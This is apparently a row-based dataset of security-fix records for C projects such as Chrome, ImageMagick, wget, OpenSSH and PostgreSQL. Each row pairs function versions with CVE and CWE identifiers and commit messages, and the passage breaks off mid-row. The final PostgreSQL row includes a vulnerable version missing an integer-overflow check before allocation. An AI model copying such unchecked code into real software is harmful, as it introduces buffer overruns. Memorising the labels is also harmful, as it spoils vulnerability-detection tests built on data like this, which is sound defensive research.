fprintf(stderr, "vnc: out of memory\n");
exit(1);
}
}
}
| void buffer_reserve(Buffer *buffer, size_t len)
{
if ((buffer->capacity - buffer->offset) < len) {
buffer->capacity += (len + 1024);
buffer->buffer = g_realloc(buffer->buffer, buffer->capacity);
if (buffer->buffer == NULL) {
fprintf(stderr, "vnc: out of memory\n");
exit(1);
}
}
}
| C | qemu | 0 |
CVE-2016-8670 | https://www.cvedetails.com/cve/CVE-2016-8670/ | CWE-119 | https://github.com/libgd/libgd/commit/53110871935244816bbb9d131da0bccff734bfe9 | 53110871935244816bbb9d131da0bccff734bfe9 | Avoid potentially dangerous signed to unsigned conversion
We make sure to never pass a negative `rlen` as size to memcpy(). See
also <https://bugs.php.net/bug.php?id=73280>.
Patch provided by Emmanuel Law. | static int allocDynamic(dynamicPtr *dp, int initialSize, void *data)
{
if(data == NULL) {
dp->logicalSize = 0;
dp->dataGood = FALSE;
dp->data = gdMalloc(initialSize);
} else {
dp->logicalSize = initialSize;
dp->dataGood = TRUE;
dp->data = data;
}
if(dp->data != NULL) {
dp->realSize = initialSize;
dp->dataGood = TRUE;
dp->pos = 0;
return TRUE;
} else {
dp->realSize = 0;
return FALSE;
}
}
| static int allocDynamic(dynamicPtr *dp, int initialSize, void *data)
{
if(data == NULL) {
dp->logicalSize = 0;
dp->dataGood = FALSE;
dp->data = gdMalloc(initialSize);
} else {
dp->logicalSize = initialSize;
dp->dataGood = TRUE;
dp->data = data;
}
if(dp->data != NULL) {
dp->realSize = initialSize;
dp->dataGood = TRUE;
dp->pos = 0;
return TRUE;
} else {
dp->realSize = 0;
return FALSE;
}
}
| C | libgd | 0 |
CVE-2016-1690 | https://www.cvedetails.com/cve/CVE-2016-1690/ | null | https://github.com/chromium/chromium/commit/9de81f45c73a8f9f215fc234a6adfe087b0eab74 | 9de81f45c73a8f9f215fc234a6adfe087b0eab74 | Remove WeakPtrFactory from PasswordAutofillAgent
Unlike in AutofillAgent, the factory is no longer used in PAA.
R=dvadym@chromium.org
BUG=609010,609007,608100,608101,433486
Review-Url: https://codereview.chromium.org/1945723003
Cr-Commit-Position: refs/heads/master@{#391475} | void PasswordAutofillAgent::ClearPreview(
blink::WebInputElement* username,
blink::WebInputElement* password) {
if (!username->isNull() && !username->suggestedValue().isEmpty()) {
username->setSuggestedValue(blink::WebString());
username->setAutofilled(was_username_autofilled_);
username->setSelectionRange(username_query_prefix_.length(),
username->value().length());
}
if (!password->suggestedValue().isEmpty()) {
password->setSuggestedValue(blink::WebString());
password->setAutofilled(was_password_autofilled_);
}
}
| void PasswordAutofillAgent::ClearPreview(
blink::WebInputElement* username,
blink::WebInputElement* password) {
if (!username->isNull() && !username->suggestedValue().isEmpty()) {
username->setSuggestedValue(blink::WebString());
username->setAutofilled(was_username_autofilled_);
username->setSelectionRange(username_query_prefix_.length(),
username->value().length());
}
if (!password->suggestedValue().isEmpty()) {
password->setSuggestedValue(blink::WebString());
password->setAutofilled(was_password_autofilled_);
}
}
| C | Chrome | 0 |
CVE-2013-2909 | https://www.cvedetails.com/cve/CVE-2013-2909/ | CWE-399 | https://github.com/chromium/chromium/commit/248a92c21c20c14b5983680c50e1d8b73fc79a2f | 248a92c21c20c14b5983680c50e1d8b73fc79a2f | Update containtingIsolate to go back all the way to top isolate from current root, rather than stopping at the first isolate it finds. This works because the current root is always updated with each isolate run.
BUG=279277
Review URL: https://chromiumcodereview.appspot.com/23972003
git-svn-id: svn://svn.chromium.org/blink/trunk@157268 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | static inline void setupResolverToResumeInIsolate(InlineBidiResolver& resolver, RenderObject* root, RenderObject* startObject)
{
if (root != startObject) {
RenderObject* parent = startObject->parent();
setupResolverToResumeInIsolate(resolver, root, parent);
notifyObserverEnteredObject(&resolver, startObject);
}
}
| static inline void setupResolverToResumeInIsolate(InlineBidiResolver& resolver, RenderObject* root, RenderObject* startObject)
{
if (root != startObject) {
RenderObject* parent = startObject->parent();
setupResolverToResumeInIsolate(resolver, root, parent);
notifyObserverEnteredObject(&resolver, startObject);
}
}
| C | Chrome | 0 |
CVE-2016-3878 | https://www.cvedetails.com/cve/CVE-2016-3878/ | CWE-284 | https://android.googlesource.com/platform/external/libavc/+/7109ce3f8f90a28ca9f0ee6e14f6ac5e414c62cf | 7109ce3f8f90a28ca9f0ee6e14f6ac5e414c62cf | Fixed error concealment when no MBs are decoded in the current pic
Bug: 29493002
Change-Id: I3fae547ddb0616b4e6579580985232bd3d65881e
| WORD32 ih264d_reset(iv_obj_t *dec_hdl, void *pv_api_ip, void *pv_api_op)
{
dec_struct_t * ps_dec;
ivd_ctl_reset_op_t *ps_ctl_op = (ivd_ctl_reset_op_t *)pv_api_op;
UNUSED(pv_api_ip);
ps_ctl_op->u4_error_code = 0;
ps_dec = (dec_struct_t *)(dec_hdl->pv_codec_handle);
if(ps_dec != NULL)
{
ih264d_init_decoder(ps_dec);
}
else
{
H264_DEC_DEBUG_PRINT(
"\nReset called without Initializing the decoder\n");
ps_ctl_op->u4_error_code = ERROR_INIT_NOT_DONE;
}
return IV_SUCCESS;
}
| WORD32 ih264d_reset(iv_obj_t *dec_hdl, void *pv_api_ip, void *pv_api_op)
{
dec_struct_t * ps_dec;
ivd_ctl_reset_op_t *ps_ctl_op = (ivd_ctl_reset_op_t *)pv_api_op;
UNUSED(pv_api_ip);
ps_ctl_op->u4_error_code = 0;
ps_dec = (dec_struct_t *)(dec_hdl->pv_codec_handle);
if(ps_dec != NULL)
{
ih264d_init_decoder(ps_dec);
}
else
{
H264_DEC_DEBUG_PRINT(
"\nReset called without Initializing the decoder\n");
ps_ctl_op->u4_error_code = ERROR_INIT_NOT_DONE;
}
return IV_SUCCESS;
}
| C | Android | 0 |
null | null | null | https://github.com/chromium/chromium/commit/181c7400b2bf50ba02ac77149749fb419b4d4797 | 181c7400b2bf50ba02ac77149749fb419b4d4797 | gpu: Use GetUniformSetup computed result size.
R=piman@chromium.org
BUG=468936
Review URL: https://codereview.chromium.org/1016193003
Cr-Commit-Position: refs/heads/master@{#321489} | error::Error GLES2DecoderImpl::DoCommandsImpl(unsigned int num_commands,
const void* buffer,
int num_entries,
int* entries_processed) {
commands_to_process_ = num_commands;
error::Error result = error::kNoError;
const CommandBufferEntry* cmd_data =
static_cast<const CommandBufferEntry*>(buffer);
int process_pos = 0;
unsigned int command = 0;
while (process_pos < num_entries && result == error::kNoError &&
commands_to_process_--) {
const unsigned int size = cmd_data->value_header.size;
command = cmd_data->value_header.command;
if (size == 0) {
result = error::kInvalidSize;
break;
}
if (static_cast<int>(size) + process_pos > num_entries) {
result = error::kOutOfBounds;
break;
}
if (DebugImpl) {
TRACE_EVENT_BEGIN0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
if (log_commands()) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "]"
<< "cmd: " << GetCommandName(command);
}
}
const unsigned int arg_count = size - 1;
unsigned int command_index = command - kStartPoint - 1;
if (command_index < arraysize(command_info)) {
const CommandInfo& info = command_info[command_index];
unsigned int info_arg_count = static_cast<unsigned int>(info.arg_count);
if ((info.arg_flags == cmd::kFixed && arg_count == info_arg_count) ||
(info.arg_flags == cmd::kAtLeastN && arg_count >= info_arg_count)) {
bool doing_gpu_trace = false;
if (DebugImpl && gpu_trace_commands_) {
if (CMD_FLAG_GET_TRACE_LEVEL(info.cmd_flags) <= gpu_trace_level_) {
doing_gpu_trace = true;
gpu_tracer_->Begin(TRACE_DISABLED_BY_DEFAULT("gpu_decoder"),
GetCommandName(command),
kTraceDecoder);
}
}
uint32 immediate_data_size = (arg_count - info_arg_count) *
sizeof(CommandBufferEntry); // NOLINT
result = (this->*info.cmd_handler)(immediate_data_size, cmd_data);
if (DebugImpl && doing_gpu_trace)
gpu_tracer_->End(kTraceDecoder);
if (DebugImpl && debug()) {
GLenum error;
while ((error = glGetError()) != GL_NO_ERROR) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "] "
<< "GL ERROR: " << GLES2Util::GetStringEnum(error)
<< " : " << GetCommandName(command);
LOCAL_SET_GL_ERROR(error, "DoCommand", "GL error from driver");
}
}
} else {
result = error::kInvalidArguments;
}
} else {
result = DoCommonCommand(command, arg_count, cmd_data);
}
if (DebugImpl) {
TRACE_EVENT_END0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
}
if (result == error::kNoError &&
current_decoder_error_ != error::kNoError) {
result = current_decoder_error_;
current_decoder_error_ = error::kNoError;
}
if (result != error::kDeferCommandUntilLater) {
process_pos += size;
cmd_data += size;
}
}
if (entries_processed)
*entries_processed = process_pos;
if (error::IsError(result)) {
LOG(ERROR) << "Error: " << result << " for Command "
<< GetCommandName(command);
}
return result;
}
| error::Error GLES2DecoderImpl::DoCommandsImpl(unsigned int num_commands,
const void* buffer,
int num_entries,
int* entries_processed) {
commands_to_process_ = num_commands;
error::Error result = error::kNoError;
const CommandBufferEntry* cmd_data =
static_cast<const CommandBufferEntry*>(buffer);
int process_pos = 0;
unsigned int command = 0;
while (process_pos < num_entries && result == error::kNoError &&
commands_to_process_--) {
const unsigned int size = cmd_data->value_header.size;
command = cmd_data->value_header.command;
if (size == 0) {
result = error::kInvalidSize;
break;
}
if (static_cast<int>(size) + process_pos > num_entries) {
result = error::kOutOfBounds;
break;
}
if (DebugImpl) {
TRACE_EVENT_BEGIN0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
if (log_commands()) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "]"
<< "cmd: " << GetCommandName(command);
}
}
const unsigned int arg_count = size - 1;
unsigned int command_index = command - kStartPoint - 1;
if (command_index < arraysize(command_info)) {
const CommandInfo& info = command_info[command_index];
unsigned int info_arg_count = static_cast<unsigned int>(info.arg_count);
if ((info.arg_flags == cmd::kFixed && arg_count == info_arg_count) ||
(info.arg_flags == cmd::kAtLeastN && arg_count >= info_arg_count)) {
bool doing_gpu_trace = false;
if (DebugImpl && gpu_trace_commands_) {
if (CMD_FLAG_GET_TRACE_LEVEL(info.cmd_flags) <= gpu_trace_level_) {
doing_gpu_trace = true;
gpu_tracer_->Begin(TRACE_DISABLED_BY_DEFAULT("gpu_decoder"),
GetCommandName(command),
kTraceDecoder);
}
}
uint32 immediate_data_size = (arg_count - info_arg_count) *
sizeof(CommandBufferEntry); // NOLINT
result = (this->*info.cmd_handler)(immediate_data_size, cmd_data);
if (DebugImpl && doing_gpu_trace)
gpu_tracer_->End(kTraceDecoder);
if (DebugImpl && debug()) {
GLenum error;
while ((error = glGetError()) != GL_NO_ERROR) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "] "
<< "GL ERROR: " << GLES2Util::GetStringEnum(error)
<< " : " << GetCommandName(command);
LOCAL_SET_GL_ERROR(error, "DoCommand", "GL error from driver");
}
}
} else {
result = error::kInvalidArguments;
}
} else {
result = DoCommonCommand(command, arg_count, cmd_data);
}
if (DebugImpl) {
TRACE_EVENT_END0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
}
if (result == error::kNoError &&
current_decoder_error_ != error::kNoError) {
result = current_decoder_error_;
current_decoder_error_ = error::kNoError;
}
if (result != error::kDeferCommandUntilLater) {
process_pos += size;
cmd_data += size;
}
}
if (entries_processed)
*entries_processed = process_pos;
if (error::IsError(result)) {
LOG(ERROR) << "Error: " << result << " for Command "
<< GetCommandName(command);
}
return result;
}
| C | Chrome | 0 |
CVE-2016-10012 | https://www.cvedetails.com/cve/CVE-2016-10012/ | CWE-119 | https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9 | 3095060f479b86288e31c79ecbc5131a66bcd2f9 | Remove support for pre-authentication compression. Doing compression
early in the protocol probably seemed reasonable in the 1990s, but
today it's clearly a bad idea in terms of both cryptography (cf.
multiple compression oracle attacks in TLS) and attack surface.
Moreover, to support it across privilege-separation zlib needed
the assistance of a complex shared-memory manager that made the
required attack surface considerably larger.
Prompted by Guido Vranken pointing out a compiler-elided security
check in the shared memory manager found by Stack
(http://css.csail.mit.edu/stack/); ok deraadt@ markus@
NB. pre-auth compression has been disabled by default in sshd
for >10 years. | mm_answer_gss_setup_ctx(int sock, Buffer *m)
{
gss_OID_desc goid;
OM_uint32 major;
u_int len;
if (!options.gss_authentication)
fatal("%s: GSSAPI authentication not enabled", __func__);
goid.elements = buffer_get_string(m, &len);
goid.length = len;
major = ssh_gssapi_server_ctx(&gsscontext, &goid);
free(goid.elements);
buffer_clear(m);
buffer_put_int(m, major);
mm_request_send(sock, MONITOR_ANS_GSSSETUP, m);
/* Now we have a context, enable the step */
monitor_permit(mon_dispatch, MONITOR_REQ_GSSSTEP, 1);
return (0);
}
| mm_answer_gss_setup_ctx(int sock, Buffer *m)
{
gss_OID_desc goid;
OM_uint32 major;
u_int len;
if (!options.gss_authentication)
fatal("%s: GSSAPI authentication not enabled", __func__);
goid.elements = buffer_get_string(m, &len);
goid.length = len;
major = ssh_gssapi_server_ctx(&gsscontext, &goid);
free(goid.elements);
buffer_clear(m);
buffer_put_int(m, major);
mm_request_send(sock, MONITOR_ANS_GSSSETUP, m);
/* Now we have a context, enable the step */
monitor_permit(mon_dispatch, MONITOR_REQ_GSSSTEP, 1);
return (0);
}
| C | src | 0 |
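The "compiler-elided security check" mentioned above points at a general C hazard rather than anything shown in this record: a bounds test written in terms of signed or pointer overflow is undefined behaviour, so the optimizer may remove it. A generic illustration of the pattern and its fix, not taken from the OpenSSH sources; both pointers are assumed to point into the same buffer:

#include <stddef.h>

/* BAD: forming base + len outside the object is undefined behaviour, so a
 * compiler is entitled to assume it never wraps and delete this test. */
static int in_bounds_bad(const char *base, size_t len, const char *limit)
{
    return base + len >= base && base + len <= limit;
}

/* GOOD: compare lengths instead of potentially wrapped pointers. */
static int in_bounds_good(const char *base, size_t len, const char *limit)
{
    return limit >= base && len <= (size_t) (limit - base);
}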
CVE-2016-5170 | https://www.cvedetails.com/cve/CVE-2016-5170/ | CWE-416 | https://github.com/chromium/chromium/commit/c3957448cfc6e299165196a33cd954b790875fdb | c3957448cfc6e299165196a33cd954b790875fdb | Cleanup and remove dead code in SetFocusedElement
This early-out was added in:
https://crrev.com/ce8ea3446283965c7eabab592cbffe223b1cf2bc
Back then, we applied fragment focus in LayoutUpdated() which could
cause this issue. This got cleaned up in:
https://crrev.com/45236fd563e9df53dc45579be1f3d0b4784885a2
so that focus is no longer applied after layout.
+Cleanup: Goto considered harmful
Bug: 795381
Change-Id: Ifeb4d2e03e872fd48cca6720b1d4de36ad1ecbb7
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1524417
Commit-Queue: David Bokan <bokan@chromium.org>
Reviewed-by: Stefan Zager <szager@chromium.org>
Cr-Commit-Position: refs/heads/master@{#641101} | Location* Document::location() const {
if (!GetFrame())
return nullptr;
return domWindow()->location();
}
| Location* Document::location() const {
if (!GetFrame())
return nullptr;
return domWindow()->location();
}
| C | Chrome | 0 |
CVE-2016-10133 | https://www.cvedetails.com/cve/CVE-2016-10133/ | CWE-119 | http://git.ghostscript.com/?p=mujs.git;a=commit;h=77ab465f1c394bb77f00966cd950650f3f53cb24 | 77ab465f1c394bb77f00966cd950650f3f53cb24 | null | static void jsR_pushtrace(js_State *J, const char *name, const char *file, int line)
{
if (J->tracetop + 1 == JS_ENVLIMIT)
js_error(J, "call stack overflow");
++J->tracetop;
J->trace[J->tracetop].name = name;
J->trace[J->tracetop].file = file;
J->trace[J->tracetop].line = line;
}
| static void jsR_pushtrace(js_State *J, const char *name, const char *file, int line)
{
if (J->tracetop + 1 == JS_ENVLIMIT)
js_error(J, "call stack overflow");
++J->tracetop;
J->trace[J->tracetop].name = name;
J->trace[J->tracetop].file = file;
J->trace[J->tracetop].line = line;
}
| C | ghostscript | 0 |
CVE-2017-6508 | https://www.cvedetails.com/cve/CVE-2017-6508/ | CWE-93 | https://git.savannah.gnu.org/cgit/wget.git/commit/?id=4d729e322fae359a1aefaafec1144764a54e8ad4 | 4d729e322fae359a1aefaafec1144764a54e8ad4 | null | sync_path (struct url *u)
{
char *newpath, *efile, *edir;
xfree (u->path);
/* u->dir and u->file are not escaped. URL-escape them before
reassembling them into u->path. That way, if they contain
separators like '?' or even if u->file contains slashes, the
path will be correctly assembled. (u->file can contain slashes
if the URL specifies it with %2f, or if an FTP server returns
it.) */
edir = url_escape_dir (u->dir);
efile = url_escape_1 (u->file, urlchr_unsafe | urlchr_reserved, 1);
if (!*edir)
newpath = xstrdup (efile);
else
{
int dirlen = strlen (edir);
int filelen = strlen (efile);
/* Copy "DIR/FILE" to newpath. */
char *p = newpath = xmalloc (dirlen + 1 + filelen + 1);
memcpy (p, edir, dirlen);
p += dirlen;
*p++ = '/';
memcpy (p, efile, filelen);
p += filelen;
*p = '\0';
}
u->path = newpath;
if (edir != u->dir)
xfree (edir);
if (efile != u->file)
xfree (efile);
/* Regenerate u->url as well. */
xfree (u->url);
u->url = url_string (u, URL_AUTH_SHOW);
}
| sync_path (struct url *u)
{
char *newpath, *efile, *edir;
xfree (u->path);
/* u->dir and u->file are not escaped. URL-escape them before
reassembling them into u->path. That way, if they contain
separators like '?' or even if u->file contains slashes, the
path will be correctly assembled. (u->file can contain slashes
if the URL specifies it with %2f, or if an FTP server returns
it.) */
edir = url_escape_dir (u->dir);
efile = url_escape_1 (u->file, urlchr_unsafe | urlchr_reserved, 1);
if (!*edir)
newpath = xstrdup (efile);
else
{
int dirlen = strlen (edir);
int filelen = strlen (efile);
/* Copy "DIR/FILE" to newpath. */
char *p = newpath = xmalloc (dirlen + 1 + filelen + 1);
memcpy (p, edir, dirlen);
p += dirlen;
*p++ = '/';
memcpy (p, efile, filelen);
p += filelen;
*p = '\0';
}
u->path = newpath;
if (edir != u->dir)
xfree (edir);
if (efile != u->file)
xfree (efile);
/* Regenerate u->url as well. */
xfree (u->url);
u->url = url_string (u, URL_AUTH_SHOW);
}
| C | savannah | 0 |
CVE-2019-14980 | https://www.cvedetails.com/cve/CVE-2019-14980/ | CWE-416 | https://github.com/ImageMagick/ImageMagick6/commit/614a257295bdcdeda347086761062ac7658b6830 | 614a257295bdcdeda347086761062ac7658b6830 | https://github.com/ImageMagick/ImageMagick6/issues/43 | MagickExport MagickOffsetType SeekBlob(Image *image,
const MagickOffsetType offset,const int whence)
{
BlobInfo
*magick_restrict blob_info;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(image->blob != (BlobInfo *) NULL);
assert(image->blob->type != UndefinedStream);
blob_info=image->blob;
switch (blob_info->type)
{
case UndefinedStream:
break;
case StandardStream:
case PipeStream:
return(-1);
case FileStream:
{
if ((offset < 0) && (whence == SEEK_SET))
return(-1);
if (fseek(blob_info->file_info.file,offset,whence) < 0)
return(-1);
blob_info->offset=TellBlob(image);
break;
}
case ZipStream:
{
#if defined(MAGICKCORE_ZLIB_DELEGATE)
if (gzseek(blob_info->file_info.gzfile,(off_t) offset,whence) < 0)
return(-1);
#endif
blob_info->offset=TellBlob(image);
break;
}
case BZipStream:
return(-1);
case FifoStream:
return(-1);
case BlobStream:
{
switch (whence)
{
case SEEK_SET:
default:
{
if (offset < 0)
return(-1);
blob_info->offset=offset;
break;
}
case SEEK_CUR:
{
if (((offset > 0) && (blob_info->offset > (SSIZE_MAX-offset))) ||
((offset < 0) && (blob_info->offset < (-SSIZE_MAX-offset))))
{
errno=EOVERFLOW;
return(-1);
}
if ((blob_info->offset+offset) < 0)
return(-1);
blob_info->offset+=offset;
break;
}
case SEEK_END:
{
if (((MagickOffsetType) blob_info->length+offset) < 0)
return(-1);
blob_info->offset=blob_info->length+offset;
break;
}
}
if (blob_info->offset < (MagickOffsetType) ((off_t) blob_info->length))
{
blob_info->eof=MagickFalse;
break;
}
if (blob_info->offset >= (MagickOffsetType) ((off_t) blob_info->extent))
return(-1);
break;
}
}
return(blob_info->offset);
}
| MagickExport MagickOffsetType SeekBlob(Image *image,
const MagickOffsetType offset,const int whence)
{
BlobInfo
*magick_restrict blob_info;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(image->blob != (BlobInfo *) NULL);
assert(image->blob->type != UndefinedStream);
blob_info=image->blob;
switch (blob_info->type)
{
case UndefinedStream:
break;
case StandardStream:
case PipeStream:
return(-1);
case FileStream:
{
if ((offset < 0) && (whence == SEEK_SET))
return(-1);
if (fseek(blob_info->file_info.file,offset,whence) < 0)
return(-1);
blob_info->offset=TellBlob(image);
break;
}
case ZipStream:
{
#if defined(MAGICKCORE_ZLIB_DELEGATE)
if (gzseek(blob_info->file_info.gzfile,(off_t) offset,whence) < 0)
return(-1);
#endif
blob_info->offset=TellBlob(image);
break;
}
case BZipStream:
return(-1);
case FifoStream:
return(-1);
case BlobStream:
{
switch (whence)
{
case SEEK_SET:
default:
{
if (offset < 0)
return(-1);
blob_info->offset=offset;
break;
}
case SEEK_CUR:
{
if (((offset > 0) && (blob_info->offset > (SSIZE_MAX-offset))) ||
((offset < 0) && (blob_info->offset < (-SSIZE_MAX-offset))))
{
errno=EOVERFLOW;
return(-1);
}
if ((blob_info->offset+offset) < 0)
return(-1);
blob_info->offset+=offset;
break;
}
case SEEK_END:
{
if (((MagickOffsetType) blob_info->length+offset) < 0)
return(-1);
blob_info->offset=blob_info->length+offset;
break;
}
}
if (blob_info->offset < (MagickOffsetType) ((off_t) blob_info->length))
{
blob_info->eof=MagickFalse;
break;
}
if (blob_info->offset >= (MagickOffsetType) ((off_t) blob_info->extent))
return(-1);
break;
}
}
return(blob_info->offset);
}
| C | ImageMagick6 | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | bool FileManagerBrowserTestBase::GetNeedsZipSupport() const {
return false;
}
| bool FileManagerBrowserTestBase::GetNeedsZipSupport() const {
return false;
}
| C | Chrome | 0 |
CVE-2011-3964 | https://www.cvedetails.com/cve/CVE-2011-3964/ | null | https://github.com/chromium/chromium/commit/0c14577c9905bd8161159ec7eaac810c594508d0 | 0c14577c9905bd8161159ec7eaac810c594508d0 | Change omnibox behavior when stripping javascript schema to navigate after stripping the schema on drag drop.
BUG=109245
TEST=N/A
Review URL: http://codereview.chromium.org/9116016
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@116692 0039d316-1c4b-4281-b951-d872f2087c98 | void OmniboxViewWin::OnLButtonUp(UINT keys, const CPoint& point) {
ScopedFreeze freeze(this, GetTextObjectModel());
DefWindowProc(WM_LBUTTONUP, keys,
MAKELPARAM(ClipXCoordToVisibleText(point.x, false), point.y));
SelectAllIfNecessary(kLeft, point);
tracking_click_[kLeft] = false;
possible_drag_ = false;
}
| void OmniboxViewWin::OnLButtonUp(UINT keys, const CPoint& point) {
ScopedFreeze freeze(this, GetTextObjectModel());
DefWindowProc(WM_LBUTTONUP, keys,
MAKELPARAM(ClipXCoordToVisibleText(point.x, false), point.y));
SelectAllIfNecessary(kLeft, point);
tracking_click_[kLeft] = false;
possible_drag_ = false;
}
| C | Chrome | 0 |
CVE-2015-1300 | https://www.cvedetails.com/cve/CVE-2015-1300/ | CWE-254 | https://github.com/chromium/chromium/commit/9c391ac04f9ac478c8b0e43b359c2b43a6c892ab | 9c391ac04f9ac478c8b0e43b359c2b43a6c892ab | Use pdf compositor service for printing when OOPIF is enabled
When OOPIF is enabled (by site-per-process flag or
top-document-isolation feature), use the pdf compositor service for
converting PaintRecord to PDF on renderers.
In the future, this will make compositing PDF from multiple renderers
possible.
TBR=jzfeng@chromium.org
BUG=455764
Change-Id: I3c28f03f4358e4228239fe1a33384f85e7716e8f
Reviewed-on: https://chromium-review.googlesource.com/699765
Commit-Queue: Wei Li <weili@chromium.org>
Reviewed-by: Daniel Cheng <dcheng@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Cr-Commit-Position: refs/heads/master@{#511616} | static void Create(chrome::mojom::SafeArchiveAnalyzerRequest request) {
mojo::MakeStrongBinding(base::MakeUnique<SafeArchiveAnalyzerImpl>(),
std::move(request));
}
| static void Create(chrome::mojom::SafeArchiveAnalyzerRequest request) {
mojo::MakeStrongBinding(base::MakeUnique<SafeArchiveAnalyzerImpl>(),
std::move(request));
}
| C | Chrome | 0 |
CVE-2014-2669 | https://www.cvedetails.com/cve/CVE-2014-2669/ | CWE-189 | https://github.com/postgres/postgres/commit/31400a673325147e1205326008e32135a78b4d8a | 31400a673325147e1205326008e32135a78b4d8a | Predict integer overflow to avoid buffer overruns.
Several functions, mostly type input functions, calculated an allocation
size such that the calculation wrapped to a small positive value when
arguments implied a sufficiently-large requirement. Writes past the end
of the inadvertent small allocation followed shortly thereafter.
Coverity identified the path_in() vulnerability; code inspection led to
the rest. In passing, add check_stack_depth() to prevent stack overflow
in related functions.
Back-patch to 8.4 (all supported versions). The non-comment hstore
changes touch code that did not exist in 8.4, so that part stops at 9.0.
Noah Misch and Heikki Linnakangas, reviewed by Tom Lane.
Security: CVE-2014-0064 | hstore_from_array(PG_FUNCTION_ARGS)
{
ArrayType *in_array = PG_GETARG_ARRAYTYPE_P(0);
int ndims = ARR_NDIM(in_array);
int count;
int32 buflen;
HStore *out;
Pairs *pairs;
Datum *in_datums;
bool *in_nulls;
int in_count;
int i;
Assert(ARR_ELEMTYPE(in_array) == TEXTOID);
switch (ndims)
{
case 0:
out = hstorePairs(NULL, 0, 0);
PG_RETURN_POINTER(out);
case 1:
if ((ARR_DIMS(in_array)[0]) % 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have even number of elements")));
break;
case 2:
if ((ARR_DIMS(in_array)[1]) != 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have two columns")));
break;
default:
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("wrong number of array subscripts")));
}
deconstruct_array(in_array,
TEXTOID, -1, false, 'i',
&in_datums, &in_nulls, &in_count);
count = in_count / 2;
/* see discussion in hstoreArrayToPairs() */
if (count > MaxAllocSize / sizeof(Pairs))
ereport(ERROR,
(errcode(ERRCODE_PROGRAM_LIMIT_EXCEEDED),
errmsg("number of pairs (%d) exceeds the maximum allowed (%d)",
count, (int) (MaxAllocSize / sizeof(Pairs)))));
pairs = palloc(count * sizeof(Pairs));
for (i = 0; i < count; ++i)
{
if (in_nulls[i * 2])
ereport(ERROR,
(errcode(ERRCODE_NULL_VALUE_NOT_ALLOWED),
errmsg("null value not allowed for hstore key")));
if (in_nulls[i * 2 + 1])
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = NULL;
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = 4;
pairs[i].isnull = true;
pairs[i].needfree = false;
}
else
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = VARDATA_ANY(in_datums[i * 2 + 1]);
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = hstoreCheckValLen(VARSIZE_ANY_EXHDR(in_datums[i * 2 + 1]));
pairs[i].isnull = false;
pairs[i].needfree = false;
}
}
count = hstoreUniquePairs(pairs, count, &buflen);
out = hstorePairs(pairs, count, buflen);
PG_RETURN_POINTER(out);
}
| hstore_from_array(PG_FUNCTION_ARGS)
{
ArrayType *in_array = PG_GETARG_ARRAYTYPE_P(0);
int ndims = ARR_NDIM(in_array);
int count;
int32 buflen;
HStore *out;
Pairs *pairs;
Datum *in_datums;
bool *in_nulls;
int in_count;
int i;
Assert(ARR_ELEMTYPE(in_array) == TEXTOID);
switch (ndims)
{
case 0:
out = hstorePairs(NULL, 0, 0);
PG_RETURN_POINTER(out);
case 1:
if ((ARR_DIMS(in_array)[0]) % 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have even number of elements")));
break;
case 2:
if ((ARR_DIMS(in_array)[1]) != 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have two columns")));
break;
default:
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("wrong number of array subscripts")));
}
deconstruct_array(in_array,
TEXTOID, -1, false, 'i',
&in_datums, &in_nulls, &in_count);
count = in_count / 2;
pairs = palloc(count * sizeof(Pairs));
for (i = 0; i < count; ++i)
{
if (in_nulls[i * 2])
ereport(ERROR,
(errcode(ERRCODE_NULL_VALUE_NOT_ALLOWED),
errmsg("null value not allowed for hstore key")));
if (in_nulls[i * 2 + 1])
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = NULL;
